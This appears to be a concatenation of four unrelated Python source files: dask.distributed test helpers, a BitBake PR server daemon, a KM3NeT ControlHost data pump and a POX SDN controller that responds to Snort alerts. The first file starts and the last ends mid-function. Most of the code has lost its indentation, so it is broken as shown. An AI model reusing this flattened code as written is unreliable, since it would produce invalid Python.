os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError("Failed to connect to %s" % (address,))
try:
sock = socket.create_connection(address, timeout=timeout)
except EnvironmentError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@gen.coroutine
def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
yield gen.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
except EnvironmentError:
return False
else:
return True
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
@gen.coroutine
def assert_can_connect(addr, timeout=None, connection_args=None):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
if timeout is None:
timeout = 0.5
comm = yield connect(addr, timeout=timeout, connection_args=connection_args)
comm.abort()
@gen.coroutine
def assert_cannot_connect(
addr, timeout=None, connection_args=None, exception_class=EnvironmentError
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
if timeout is None:
timeout = 0.5
with pytest.raises(exception_class):
comm = yield connect(addr, timeout=timeout, connection_args=connection_args)
comm.abort()
@gen.coroutine
def assert_can_connect_from_everywhere_4_6(
port, timeout=None, connection_args=None, protocol="tcp"
):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
args = (timeout, connection_args)
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), *args),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), *args),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), *args),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), *args),
]
yield futures
@gen.coroutine
def assert_can_connect_from_everywhere_4(
port, timeout=None, connection_args=None, protocol="tcp"
):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
args = (timeout, connection_args)
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), *args),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), *args),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), *args),
assert_cannot_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), *args),
]
yield futures
@gen.coroutine
def assert_can_connect_locally_4(port, timeout=None, connection_args=None):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
args = (timeout, connection_args)
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, *args)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, *args),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args),
]
yield futures
@gen.coroutine
def assert_can_connect_from_everywhere_6(port, timeout=None, connection_args=None):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
args = (timeout, connection_args)
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, *args),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args),
assert_can_connect("tcp://[::1]:%d" % port, *args),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args),
]
yield futures
@gen.coroutine
def assert_can_connect_locally_6(port, timeout=None, connection_args=None):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
args = (timeout, connection_args)
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, *args),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args),
assert_can_connect("tcp://[::1]:%d" % port, *args),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args)]
yield futures
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger.
"""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = six.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
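# Illustrative use (the logger name is hypothetical):
#
#     with captured_logger("distributed.scheduler") as sio:
#         ...  # code that emits log records
#     text = sio.getvalue()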
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler.
"""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = six.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = config.copy()
try:
config.clear()
config.update(defaults.copy())
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
c = {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
return c
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e))
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
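# A minimal sketch of how the TLS helpers above are meant to be combined; the
# test name and coroutine signature follow the usual gen_cluster convention and
# are assumptions here, not definitions from this module:
#
#     @gen_tls_cluster(client=True)
#     def test_tls_roundtrip(c, s, a, b):
#         assert s.address.startswith("tls://")
#         yield c.submit(lambda x: x + 1, 1)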
@contextmanager
def save_sys_modules():
    # Snapshot copies, so entries added inside the block can be removed on exit.
    old_modules = dict(sys.modules)
    old_path = list(sys.path)
    try:
        yield
    finally:
        sys.path[:] = [elem for elem in sys.path if elem in old_path]
        for elem in list(sys.modules):
            if elem not in old_modules:
                del sys.modules[elem]
@contextmanager
def check_thread_leak():
active_threads_start = set(threading._active)
yield
start = time()
while True:
bad = [
t
for t, v in threading._active.items()
if t not in active_threads_start
and "Threaded" not in v.name
and "watch message" not in v.name
and "TCP-Executor" not in v.name
]
if not bad:
break
else:
sleep(0.01)
if time() > start + 5:
from distributed import profile
tid = bad[0]
thread = threading._active[tid]
call_stacks = profile.call_stack(sys._current_frames()[tid])
assert False, (thread, call_stacks)
@contextmanager
def check_process_leak():
start_children = set(mp_context.active_children())
yield
for i in range(50):
if not set(mp_context.active_children()) - start_children:
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
_cleanup_dangling()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
w.close(report=False, executor_wait=False)
if w.status == "running":
w.close()
Worker._instances.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(n.status == "closed" or n.status == "init" for n in Nanny._instances), {
n: n.status for n in Nanny._instances
}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == "closed" for c in SpecCluster._instances)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, processes=True, instances=True, timeout=1):
@contextmanager
def null():
yield
with check_thread_leak() if threads else null():
with pristine_loop() as loop:
with check_process_leak() if processes else null():
with check_instances() if instances else null():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with ignoring(AttributeError):
del thread_state.on_event_loop_thread
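# A minimal usage sketch for clean(), which wraps a test body in the thread,
# process, instance and RPC checks defined above:
#
#     def test_something():
#         with clean(timeout=2) as loop:
#             pass  # run the code under test against `loop`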
|
serv.py
|
import os,sys,logging
import signal, time, atexit, threading
from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
import xmlrpclib
import threading
import Queue
try:
import sqlite3
except ImportError:
from pysqlite2 import dbapi2 as sqlite3
import bb.server.xmlrpc
import prserv
import prserv.db
import errno
logger = logging.getLogger("BitBake.PRserv")
if sys.hexversion < 0x020600F0:
print("Sorry, python 2.6 or later is required.")
sys.exit(1)
class Handler(SimpleXMLRPCRequestHandler):
def _dispatch(self,method,params):
try:
value=self.server.funcs[method](*params)
except:
import traceback
traceback.print_exc()
raise
return value
PIDPREFIX = "/tmp/PRServer_%s_%s.pid"
singleton = None
class PRServer(SimpleXMLRPCServer):
def __init__(self, dbfile, logfile, interface, daemon=True):
''' constructor '''
SimpleXMLRPCServer.__init__(self, interface,
logRequests=False, allow_none=True)
self.dbfile=dbfile
self.daemon=daemon
self.logfile=logfile
self.working_thread=None
self.host, self.port = self.socket.getsockname()
self.pidfile=PIDPREFIX % (self.host, self.port)
self.register_function(self.getPR, "getPR")
self.register_function(self.quit, "quit")
self.register_function(self.ping, "ping")
self.register_function(self.export, "export")
self.register_function(self.importone, "importone")
self.register_introspection_functions()
self.db = prserv.db.PRData(self.dbfile)
self.table = self.db["PRMAIN"]
self.requestqueue = Queue.Queue()
self.handlerthread = threading.Thread(target = self.process_request_thread)
self.handlerthread.daemon = False
def process_request_thread(self):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
while True:
(request, client_address) = self.requestqueue.get()
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
self.table.sync()
def process_request(self, request, client_address):
self.requestqueue.put((request, client_address))
def export(self, version=None, pkgarch=None, checksum=None, colinfo=True):
try:
return self.table.export(version, pkgarch, checksum, colinfo)
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def importone(self, version, pkgarch, checksum, value):
return self.table.importone(version, pkgarch, checksum, value)
def ping(self):
return not self.quit
def getinfo(self):
return (self.host, self.port)
def getPR(self, version, pkgarch, checksum):
try:
return self.table.getValue(version, pkgarch, checksum)
except prserv.NotFoundError:
logger.error("can not find value for (%s, %s)",version, checksum)
return None
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def quit(self):
self.quit=True
return
def work_forever(self,):
self.quit = False
self.timeout = 0.5
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(os.getpid())))
self.handlerthread.start()
while not self.quit:
self.handle_request()
self.table.sync()
logger.info("PRServer: stopping...")
self.server_close()
return
def start(self):
pid = self.daemonize()
# Ensure both the parent sees this and the child from the work_forever log entry above
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(pid)))
def delpid(self):
os.remove(self.pidfile)
def daemonize(self):
"""
        See "Advanced Programming in the UNIX Environment", Section 13.3.
"""
try:
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
#parent return instead of exit to give control
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
os.setsid()
"""
fork again to make sure the daemon is not session leader,
which prevents it from acquiring controlling terminal
"""
try:
pid = os.fork()
if pid > 0: #parent
os._exit(0)
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
os.umask(0)
os.chdir("/")
sys.stdout.flush()
sys.stderr.flush()
si = file('/dev/null', 'r')
so = file(self.logfile, 'a+')
se = so
os.dup2(si.fileno(),sys.stdin.fileno())
os.dup2(so.fileno(),sys.stdout.fileno())
os.dup2(se.fileno(),sys.stderr.fileno())
# Clear out all log handlers prior to the fork() to avoid calling
# event handlers not part of the PRserver
for logger_iter in logging.Logger.manager.loggerDict.keys():
logging.getLogger(logger_iter).handlers = []
# Ensure logging makes it to the logfile
streamhandler = logging.StreamHandler()
streamhandler.setLevel(logging.DEBUG)
formatter = bb.msg.BBLogFormatter("%(levelname)s: %(message)s")
streamhandler.setFormatter(formatter)
logger.addHandler(streamhandler)
# write pidfile
pid = str(os.getpid())
pf = file(self.pidfile, 'w')
pf.write("%s\n" % pid)
pf.close()
self.work_forever()
self.delpid()
os._exit(0)
class PRServSingleton(object):
def __init__(self, dbfile, logfile, interface):
self.dbfile = dbfile
self.logfile = logfile
self.interface = interface
self.host = None
self.port = None
def start(self):
self.prserv = PRServer(self.dbfile, self.logfile, self.interface)
self.prserv.start()
self.host, self.port = self.prserv.getinfo()
def getinfo(self):
return (self.host, self.port)
class PRServerConnection(object):
def __init__(self, host, port):
if is_local_special(host, port):
host, port = singleton.getinfo()
self.host = host
self.port = port
self.connection, self.transport = bb.server.xmlrpc._create_server(self.host, self.port)
def terminate(self):
try:
logger.info("Terminating PRServer...")
self.connection.quit()
except Exception as exc:
sys.stderr.write("%s\n" % str(exc))
def getPR(self, version, pkgarch, checksum):
return self.connection.getPR(version, pkgarch, checksum)
def ping(self):
return self.connection.ping()
def export(self,version=None, pkgarch=None, checksum=None, colinfo=True):
return self.connection.export(version, pkgarch, checksum, colinfo)
def importone(self, version, pkgarch, checksum, value):
return self.connection.importone(version, pkgarch, checksum, value)
def getinfo(self):
return self.host, self.port
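# A minimal usage sketch for PRServerConnection; the host, port and package
# identifiers below are placeholders:
#
#     conn = PRServerConnection("localhost", 8585)
#     if conn.ping():
#         pr = conn.getPR("1.0-r0", "qemux86", "deadbeef")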
def start_daemon(dbfile, host, port, logfile):
pidfile = PIDPREFIX % (host, port)
try:
pf = file(pidfile,'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if pid:
sys.stderr.write("pidfile %s already exist. Daemon already running?\n"
% pidfile)
return 1
server = PRServer(os.path.abspath(dbfile), os.path.abspath(logfile), (host,port))
server.start()
return 0
def stop_daemon(host, port):
pidfile = PIDPREFIX % (host, port)
try:
pf = file(pidfile,'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if not pid:
sys.stderr.write("pidfile %s does not exist. Daemon not running?\n"
% pidfile)
try:
PRServerConnection(host, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
try:
if pid:
wait_timeout = 0
print("Waiting for pr-server to exit.")
while is_running(pid) and wait_timeout < 50:
time.sleep(0.1)
wait_timeout += 1
if is_running(pid):
print("Sending SIGTERM to pr-server.")
os.kill(pid,signal.SIGTERM)
time.sleep(0.1)
if os.path.exists(pidfile):
os.remove(pidfile)
except OSError as e:
err = str(e)
if err.find("No such process") <= 0:
raise e
return 0
def is_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
return False
return True
def is_local_special(host, port):
if host.strip().upper() == 'localhost'.upper() and (not port):
return True
else:
return False
class PRServiceConfigError(Exception):
pass
def auto_start(d):
global singleton
host_params = filter(None, (d.getVar('PRSERV_HOST', True) or '').split(':'))
if not host_params:
return None
if len(host_params) != 2:
logger.critical('\n'.join(['PRSERV_HOST: incorrect format',
'Usage: PRSERV_HOST = "<hostname>:<port>"']))
raise PRServiceConfigError
if is_local_special(host_params[0], int(host_params[1])) and not singleton:
import bb.utils
cachedir = (d.getVar("PERSISTENT_DIR", True) or d.getVar("CACHE", True))
if not cachedir:
logger.critical("Please set the 'PERSISTENT_DIR' or 'CACHE' variable")
raise PRServiceConfigError
bb.utils.mkdirhier(cachedir)
dbfile = os.path.join(cachedir, "prserv.sqlite3")
logfile = os.path.join(cachedir, "prserv.log")
singleton = PRServSingleton(os.path.abspath(dbfile), os.path.abspath(logfile), ("localhost",0))
singleton.start()
if singleton:
host, port = singleton.getinfo()
else:
host = host_params[0]
port = int(host_params[1])
try:
connection = PRServerConnection(host,port)
connection.ping()
realhost, realport = connection.getinfo()
return str(realhost) + ":" + str(realport)
except Exception:
logger.critical("PRservice %s:%d not available" % (host, port))
raise PRServiceConfigError
def auto_shutdown(d=None):
global singleton
if singleton:
host, port = singleton.getinfo()
try:
PRServerConnection(host, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
singleton = None
def ping(host, port):
conn=PRServerConnection(host, port)
return conn.ping()
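# A minimal sketch of driving the daemon entry points above; the paths and the
# port are placeholders:
#
#     start_daemon("/tmp/prserv.sqlite3", "localhost", 8585, "/tmp/prserv.log")
#     # ... builds run against localhost:8585 ...
#     stop_daemon("localhost", 8585)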
|
ch.py
|
#!/usr/bin/env python
# Filename: ch.py
# pylint: disable=
"""
Pump for the data stream provided by a ControlHost server (JLigier).
"""
from thepipe import Module, Blob
from km3pipe.controlhost import Client
from km3pipe.time import Cuckoo
from km3pipe.logger import get_logger
import threading
import socket
import time
import numpy as np
from collections import deque
from queue import Queue, Empty
__author__ = "Tamas Gal"
__copyright__ = "Copyright 2016, Tamas Gal and the KM3NeT collaboration."
__credits__ = []
__license__ = "MIT"
__maintainer__ = "Tamas Gal"
__email__ = "tgal@km3net.de"
__status__ = "Development"
log = get_logger(__name__) # pylint: disable=C0103
class CHPump(Module):
"""A pump for ControlHost data."""
def configure(self):
self.host = self.get("host") or "127.0.0.1"
self.port = self.get("port") or 5553
self.tags = self.get("tags") or "MSG"
self.timeout = self.get("timeout") or 60 * 60 * 24
self.max_queue = self.get("max_queue") or 50
self.key_for_data = self.get("key_for_data") or "CHData"
self.key_for_prefix = self.get("key_for_prefix") or "CHPrefix"
self.subscription_mode = self.get("subscription_mode", default="any")
self.show_statistics = self.get("show_statistics", default=False)
self.statistics_interval = self.get("statistics_interval", default=30)
self.cuckoo_warn = Cuckoo(60 * 5, log.warning)
self.performance_warn = Cuckoo(
self.statistics_interval, self.show_performance_statistics
)
self.idle_dt = deque(maxlen=1000)
self.idle_timer = time.time()
self.message_count = 0
self.loop_cycle = 0
self.queue = Queue()
self.client = None
self.thread = None
if self.subscription_mode == "all":
self.log.warning(
"You subscribed to the ligier in 'all'-mode! "
"If you are too slow with data processing, "
"you will block other clients. "
"If you don't understand this message "
"and are running this code on a DAQ machine, "
"consult a DAQ expert now and stop this script."
)
print(
"Connecting to {0} on port {1}\n"
"Subscribed tags: {2}\n"
"Connection timeout: {3}s\n"
"Maximum queue size for incoming data: {4}".format(
self.host, self.port, self.tags, self.timeout, self.max_queue
)
)
self._init_controlhost()
self._start_thread()
def _start_thread(self):
log.debug("Starting and demonising thread.")
self.thread = threading.Thread(target=self._run, args=())
self.thread.daemon = True
self.thread.start()
def _init_controlhost(self):
"""Set up the controlhost connection"""
log.debug("Connecting to JLigier")
self.client = Client(self.host, self.port)
self.client._connect()
log.debug("Subscribing to tags: %s", self.tags)
for tag in self.tags.split(","):
self.client.subscribe(tag.strip(), mode=self.subscription_mode)
log.debug("Controlhost initialisation done.")
def _run(self):
log.debug("Entering the main loop.")
while True:
current_qsize = self.queue.qsize()
self.loop_cycle += 1
self._set_idle_timer()
try:
prefix, data = self.client.get_message()
except EOFError:
log.warning("EOF from Ligier, trying again in 30 seconds...")
time.sleep(30)
continue
except BufferError:
log.error("Buffer error in Ligier stream, aborting...")
break
else:
self._add_idle_dt()
self.message_count += 1
self.performance_warn()
# log.debug("%d bytes received from network.", len(data))
if not data:
log.critical(
"No data received, connection died.\n"
+ "Trying to reconnect in 30 seconds."
)
time.sleep(30)
try:
log.debug("Reinitialising new CH connection.")
self._init_controlhost()
except socket.error:
log.error("Failed to connect to host.")
continue
if current_qsize > self.max_queue:
self.cuckoo_warn(
"Maximum queue size ({0}) reached, "
"dropping data.".format(self.max_queue)
)
else:
self.queue.put((prefix, data))
log.debug("Quitting the main loop.")
def process(self, blob):
"""Wait for the next packet and put it in the blob"""
try:
log.debug("Waiting for queue items.")
prefix, data = self.queue.get(timeout=self.timeout)
log.debug("Got %d bytes from queue.", len(data))
except Empty:
log.warning("ControlHost timeout (%d s) reached", self.timeout)
raise StopIteration("ControlHost timeout reached.")
blob[self.key_for_prefix] = prefix
blob[self.key_for_data] = data
return blob
def show_performance_statistics(self):
if not self.show_statistics:
return
dt = np.median(self.idle_dt)
current_qsize = self.queue.qsize()
log_func = self.cprint
if dt < 0 or current_qsize > 0:
log_func = self.log.warning
log_func(
"Message rate: {0:.1f} Hz, median idle time per message: "
"{1:.3f} us (current queue size: {2})".format(
self.message_count / self.statistics_interval, dt * 1e6, current_qsize
)
)
self.message_count = 0
def _set_idle_timer(self):
self.idle_timer = time.time()
def _add_idle_dt(self):
now = time.time()
self.idle_dt.append(now - self.idle_timer)
def finish(self):
"""Clean up the JLigier controlhost connection"""
log.debug("Disconnecting from JLigier.")
self.client.socket.shutdown(socket.SHUT_RDWR)
self.client._disconnect()
def __iter__(self):
return self
def __next__(self):
return self.process(Blob())
def next(self):
return self.__next__()
def CHTagger(blob):
tag = str(blob["CHPrefix"].tag)
blob[tag] = True
return blob
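# A minimal sketch wiring CHPump and CHTagger into a thepipe Pipeline; the
# ligier address, tag and cycle count are assumptions for illustration only:
#
#     from thepipe import Pipeline
#
#     pipe = Pipeline()
#     pipe.attach(CHPump, host="127.0.0.1", port=5553, tags="IO_EVT")
#     pipe.attach(CHTagger)
#     pipe.drain(10)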
|
securecore.py
|
from pox.core import core
from pox.lib.revent import revent
import pox.openflow.libopenflow_01 as of
import pox.openflow.nicira as nx
from pox.openflow.discovery import Discovery
from pox.lib.util import dpid_to_str
from pox.lib.util import str_to_bool
from pox.lib.addresses import IPAddr
from pox.lib.addresses import EthAddr
import pox.lib.packet as pkt
import pox.openflow.spanning_tree
import asyncore
import mysql.connector
import struct
import asynchat
import socket
import thread
import os
import sys
import RouteApp
import threading
import time
import pyinotify
import random
log = core.getLogger()
SNORT_ADDR = "10.0.1.2"
ip2serv_name = {"10.0.0.252" : "http", "10.0.0.1" : "http"}
serv_name2ip = {"http" : ["10.0.0.252", "10.0.0.1"]}
gateway_mac=EthAddr("08:00:27:47:7b:44")
MAXCMD = 100
HIGH = 4
MID = 3
LOWMID = 2
LOW = 1
def start_server(socket_map):
asyncore.loop(map = socket_map)
def start_watch(wm, eh):
notifier = pyinotify.Notifier(wm, eh)
notifier.loop()
class MyEventHandler(pyinotify.ProcessEvent):
log.info("Starting monitor...")
def gen_cmd(self, pathname):
try:
fd = open(pathname, 'r')
commands = fd.readlines(MAXCMD)
fd.close()
return commands
except IOError as e:
log.error("I/O error ({0}): {1}".format(e.errno, e.strerror))
return -1
def func_gen(self, event):
commands = self.gen_cmd(event.pathname)
if not commands == -1:
core.secure.func_gen(event.name, commands)
func_name = event.name
value = func_name.split('_')
if not core.secure.func_table.has_key(value[0]):
core.secure.func_table[value[0]]={}
if not core.secure.func_table[value[0]].has_key(value[1]):
core.secure.func_table[value[0]][value[1]] = {}
if (len(value) == 4):
core.secure.func_table[value[0]][value[1]][(value[2],value[3])] = func_name
else:
core.secure.func_table[value[0]][value[1]]["any"] = func_name
def func_del(self, event):
func_name = "func_" + event.name
try:
funcname = func_name.replace(" ", "_")
core.secure.funclist.remove(func_name)
delattr(core.secure.handlers, funcname)
value = func_name.split('_')
del value[0]
if (len(value) == 4):
del core.secure.func_table[value[0]][value[1]][(value[2],value[3])]
else:
del core.secure.func_table[value[0]][value[1]]["any"]
log.info("handler %s removed, rules updated."%func_name)
except ValueError as e:
log.error('%s is not in the funclist'%func_name)
def process_IN_MOVED_TO(self, event):
log.debug('MOVED_TO event: %s'%event.name)
self.func_gen(event)
def process_IN_MODIFY(self, event):
log.debug('MODIFY event: %s'%event.name)
self.func_del(event)
self.func_gen(event)
def process_IN_DELETE(self, event):
log.debug('DELETE event: %s'%event.name)
self.func_del(event)
def process_IN_MOVED_FROM(self, event):
log.debug('MOVED_FROM event: %s', event.name)
self.func_del(event)
class AlertIn(revent.Event):
def __init__(self, alertmsg):
revent.Event.__init__(self)
self.name = alertmsg[0]
self.priority = alertmsg[1]
self.src = alertmsg[2]
self.dst = alertmsg[3]
self.occation = alertmsg[4]
class Reminder(revent.EventMixin):
_eventMixin_events = set([
AlertIn,
])
def __init__(self):
self.msg = None
def set_msg(self, msg):
self.msg = msg
def alert(self):
self.raiseEvent(AlertIn, self.msg)
class secure_connect(asynchat.async_chat):
def __init__(self, connection, socket_map):
asynchat.async_chat.__init__(self, connection, map = socket_map)
self.buf = []
self.ac_in_buffer_size = 1024
self.set_terminator("@")
def collect_incoming_data(self, data):
self.buf.append(data)
def found_terminator(self):
temp = ("".join(self.buf)).split("\n")
core.Reminder.set_msg(temp)
core.Reminder.alert()
self.buf=[]
self.set_terminator("@")
class secure_server(asyncore.dispatcher):
def __init__(self, socket_map):
self.socket_map = socket_map
asyncore.dispatcher.__init__(self, map = self.socket_map)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind(("0.0.0.0",20000))
self.listen(5)
def handle_accept(self):
connection, addr = self.accept()
server_connect = secure_connect(connection, self.socket_map)
class handlers(object):
def __init__(self):
pass
class secure(object):
def start(self):
core.openflow.addListeners(self)
core.openflow_discovery.addListeners(self)
def __init__(self, path):
self.path = path
self.filelist=None
self.counter=0
self.filenum=0
self.cmdlist = ["disconnect", "wait", "reconnect", "pass", "monitor", "reset", "redirect", "unredirect", "passit"]
self.handlers = handlers()
self.funclist = None
self.sig_table= {"BAD-TRAFFIC same SRC/DST":"1",
"ICMP Time-To-Live Exceeded in Transit":"2",
"ICMP Echo Reply":"3",
"ICMP PING BSDtype":"4",
"ICMP PING *NIX":"5",
"ICMP PING":"6",
"SNMP AgentX/tcp request":"7",
"SNMP request tcp":"8"}
self.func_table={}
self.alys_cmd()
self.action_triggered = False
self.name_process()
self.mactable = {}
self.iptable = {}
self.droplist = {}
self.monitorlist = {}
self.redirectlist = {}
self.ignorelist = []
self.socket_map = {}
self.server = secure_server(self.socket_map)
core.Reminder.addListeners(self)
core.addListener(pox.core.GoingUpEvent, self.start_server)
core.call_when_ready(self.start, ["openflow_discovery", "NX"])
core.callDelayed(1, self.start_watch)
def start_server(self, event):
thread.start_new_thread(start_server, (self.socket_map,))
def start_watch(self):
wm = pyinotify.WatchManager()
wm.add_watch(self.path, pyinotify.ALL_EVENTS, rec = True)
eh = MyEventHandler()
thread.start_new_thread(start_watch, (wm, eh))
def func_gen(self, File, cmds):
func_name = "func_" + File
self.funclist.append(func_name)
func_name = func_name.replace(" ", "_")
